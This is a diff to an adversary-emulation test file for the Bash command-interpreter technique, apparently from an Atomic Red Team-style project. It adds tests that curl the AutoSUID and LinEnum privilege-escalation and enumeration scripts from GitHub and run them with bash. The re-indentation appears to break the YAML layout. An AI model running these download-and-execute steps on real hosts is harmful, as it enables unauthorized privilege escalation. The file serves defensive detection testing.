revert_id

atomics/T1059.004/T1059.004.yaml

@@ -1,7 +1,7 @@
-attack_technique: T1059.004
+  attack_technique: T1059.004
-display_name: 'Command and Scripting Interpreter: Bash'
+  display_name: 'Command and Scripting Interpreter: Bash'
-atomic_tests:
+  atomic_tests:
-- name: Create and Execute Bash Shell Script
+  - name: Create and Execute Bash Shell Script
     auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
     description: |
       Creates and executes a simple bash script.
@@ -22,7 +22,7 @@ atomic_tests:
       cleanup_command: |
         rm #{script_path}
       name: sh
-- name: Command-Line Interface
+  - name: Command-Line Interface
     auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
     description: |
       Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
@@ -38,3 +38,58 @@ atomic_tests:
       cleanup_command: |
         rm /tmp/art-fish.txt
       name: sh
+  - name: Harvest SUID executable files
+    description: |
+      AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges. 
+    supported_platforms:
+    - linux 
+    input_arguments:
+      autosuid:
+        description: Path to the autosuid shell script
+        type: Path
+        default: PathToAtomicsFolder/T1059.004/src/AutoSUID.sh
+      autosuid_url:
+        description: Path to download autosuid shell script
+        type: Url
+        default: https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh
+    dependency_executor_name: bash
+    dependencies:
+    - description: |
+        AutoSUID must exist on disk at specified location (#{autosuid})
+      prereq_command: |
+        if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        curl #{autosuid_url} --output #{autosuid}
+    executor:
+      command: |
+        chmod +x #{autosuid}
+        bash #{autosuid}
+      name: sh
+
+  - name: LinEnum tool execution
+    description: |
+      LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
+    supported_platforms:
+    - linux 
+    input_arguments:
+      linenum:
+        description: Path to the LinEnum shell script
+        type: Path
+        default: PathToAtomicsFolder/T1059.004/src/LinEnum.sh
+      linenum_url:
+        description: Path to download LinEnum shell script
+        type: Url
+        default: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
+    dependency_executor_name: bash
+    dependencies:
+    - description: |
+        LinnEnum must exist on disk at specified location (#{linenum})
+      prereq_command: |
+        if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
+      get_prereq_command: |
+        curl #{linenum_url} --output #{linenum}
+    executor:
+      command: |
+        chmod +x #{linenum}
+        bash #{linenum}
+      name: sh